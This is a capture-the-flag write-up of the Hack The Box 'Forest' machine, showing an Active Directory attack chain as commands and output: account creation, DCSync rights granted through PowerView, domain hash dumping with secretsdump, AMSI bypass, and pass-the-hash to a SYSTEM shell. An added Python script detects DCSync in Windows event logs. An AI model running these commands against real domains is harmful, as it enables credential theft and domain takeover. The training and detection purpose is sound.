# DCSync Example Forest HTB

### Exploiting DCSync (from Forest (HTB))

From the figure above, we can see that *svc-alfresco* is a member of the group *Service Accounts*, which is a member of the group *Privileged IT Accounts*, which is in turn a member of *Account Operators*. This can be seen by checking the "shortest path to domain admins" and then checking the node properties.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FH34csA8njH4qcv6CXrg4%2Fimage.png?alt=media&#x26;token=af00e6fe-47c5-42e8-b049-43bfff546733" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F4Ei8CXmH5AUYFcnrQgVI%2Fimage.png?alt=media&#x26;token=6fe7477a-f0d7-438f-929d-c414eda9b0dd" alt=""><figcaption></figcaption></figure>

Moreover, the *Account Operators* group has *GenericAll* permissions on the *Exchange Windows Permissions* group, which has *WriteDacl* permissions on the domain.

This was a mouthful, so let’s break it down.

* *svc-alfresco* is not just a member of *Service Accounts*, but (through nested membership) is also a member of the groups *Privileged IT Accounts* and *Account Operators*.
* The Account Operators group [grants limited account creation privileges to a user](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-accountoperators). Therefore, the user *svc-alfresco* can create other users on the domain.
* The *Account Operators* group has *GenericAll* permission on the *Exchange Windows Permissions* group. This permission essentially gives members full control of the group and therefore allows them to directly modify group membership. Since *svc-alfresco* is a member of *Account Operators*, it can add members to the *Exchange Windows Permissions* group.
* The *Exchange Windows Permissions* group has *WriteDacl* permission on the domain *HTB.LOCAL*. This permission allows members to modify the DACL (Discretionary Access Control List) of the domain object. We'll abuse this to grant ourselves DCSync privileges, which give us the right to perform domain replication and dump all the password hashes from the domain.

Putting all the pieces together, the following is our attack path.

1. Create a user on the domain. This is possible because *svc-alfresco* is a member of the group *Account Operators*.
2. Add the user to the *Exchange Windows Permission* group. This is possible because *svc-alfresco* has *GenericAll* permissions on the *Exchange Windows Permissions* group.
3. Give the user DcSync privileges. This is possible because the user is a part of the *Exchange Windows Permissions* group which has *WriteDacl* permission on the *htb.local* domain.
4. Perform a DcSync attack and dump the password hashes of all the users on the domain.
5. Perform a Pass the Hash attack to get access to the administrator’s account.

Now create a new user and add it to the *Exchange Windows Permissions* group.

```
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user ammar ammar123 /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user ammar
User name                    ammar
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            7/30/2023 1:26:16 AM
Password expires             Never
Password changeable          7/31/2023 1:26:16 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" /add ammar
The command completed successfully.
```

Alternate syntax (PowerView):

```
Add-DomainGroupMember -Identity "Exchange Windows Permissions" -Members "ammar"
```

To list the available Evil-WinRM modules, use the command:

```
menu
```

Run the following commands before executing anything on the target (the `menu` output here shows Evil-WinRM's built-in modules, including `Bypass-4MSI`):

```
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> menu


   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (`     '`    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers

[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> powershell -ep bypass
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Desktop>
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Bypass-4MSI

```

### Abusing WriteDacl

First, we need to create a credential object for the newly created user.

```
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $username ="htb\ammar"
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $password = ConvertTo-SecureString "ammar123" -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $credential = New-Object System.Management.Automation.PSCredential($username, $password)
```

Next we need PowerView, so locate it on the attacking machine and upload it.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ locate PowerView
/usr/share/windows-resources/powersploit/Recon/PowerView.ps1

┌──(kali㉿kali)-[~/Desktop]
└─$ cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
```

```
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading /home/kali/Desktop/PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
```

Now import PowerView; afterwards `menu` also lists the PowerView functions.

```
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> menu
[+] Add-DomainGroupMember 
[+] Add-DomainObjectAcl 
[+] Add-RemoteConnection 
[+] Add-Win32Type 
[+] Convert-ADName 
[+] Convert-DNSRecord 
[+] ConvertFrom-LDAPLogonHours 
[+] ConvertFrom-SID 
[+] ConvertFrom-UACValue 
[+] Convert-LDAPProperty 

```

Now execute one of the following to grant DCSync rights to the new user.

```
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Add-DomainObjectAcl -Credential $credential -PrincipalIdentity 'htb\ammar' -TargetIdentity 'htb.local\Domain Admins' -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Add-ObjectAcl -PrincipalIdentity 'htb\ammar' -Credential $credential -Rights DCSync
```

You can also target the domain object directly by its distinguished name:

```
Add-DomainObjectAcl -Credential $credential -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity ammar -Rights DCSync
```

### Dumping hashes

Now we can use Impacket's `secretsdump` to dump all the domain hashes. The `RemoteOperations failed ... rpc_s_access_denied` line below is expected: the new user is not a local administrator on the DC, but the DRSUAPI (replication) method still succeeds because of the DCSync rights we just granted.

```
┌──(kali㉿kali)-[~/Desktop/new]
└─$ impacket-secretsdump htb.local/ammar:ammar123@10.10.10.161
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
```
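Steps 3 and 4 of the attack path leave a trail on the domain controller: the DACL write on the domain head is logged as Event ID 5136 (Directory Service Changes), and the replication itself as Event ID 4662 carrying the replication control-access-right GUIDs. The following added example is not from the original write-up; it runs this detection over constructed sample events, and the DC machine account name `DC01$` and the flat dict layout standing in for the event XML are assumptions.

```python
"""Flag DCSync-related activity in Windows Security events (added example)."""
from typing import Dict, Iterable, List, Optional

# Control-access-right GUIDs that together make up "DCSync" rights.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed allow-list of DC machine accounts that legitimately replicate.
DOMAIN_CONTROLLERS = {"DC01$"}
DOMAIN_ROOT_DN = "DC=htb,DC=local"


def flag_event(event: Dict[str, object]) -> Optional[str]:
    """Return a finding for a suspicious 4662/5136 event, else None."""
    eid = event["EventID"]
    who = str(event.get("SubjectUserName", ""))
    if eid == 4662:
        # Properties lists the GUIDs of the rights exercised, in braces.
        props = str(event.get("Properties", "")).lower()
        hit = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if hit and who.upper() not in DOMAIN_CONTROLLERS:
            return f"DCSync: {who} exercised {', '.join(hit)}"
    elif eid == 5136:
        # A write to the security descriptor of the domain head itself.
        if (event.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"
                and event.get("ObjectDN") == DOMAIN_ROOT_DN):
            return f"WriteDacl: {who} modified the DACL of {DOMAIN_ROOT_DN}"
    return None


def scan(events: Iterable[Dict[str, object]]) -> List[str]:
    return [f for f in (flag_event(e) for e in events) if f]


# Constructed sample events mirroring steps 3 and 4 of the write-up.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "ammar", "ObjectDN": DOMAIN_ROOT_DN,
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "SubjectUserName": "ammar",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC01$",  # legitimate DC-to-DC replication
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "ammar",  # unrelated access (user class GUID)
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Both 5136 and 4662 require the corresponding audit subcategories (Directory Service Changes and Directory Service Access) plus a SACL on the domain object to be generated at all.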

### Pass the Hash

Now we can simply pass the Administrator hash to get a SYSTEM shell.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file zcJDWnNu.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service GPAd on 10.10.10.161.....
[*] Starting service GPAd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

#### Pass the Hash with Evil-WinRM

You can also use Evil-WinRM. Remember to pass only the NT hash (the part after the colon).

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F2XfM8kqxAIelDIvFk9Fg%2Fimage.png?alt=media&#x26;token=61270de4-7f62-43d0-a991-7dec9f992a55" alt=""><figcaption></figcaption></figure>
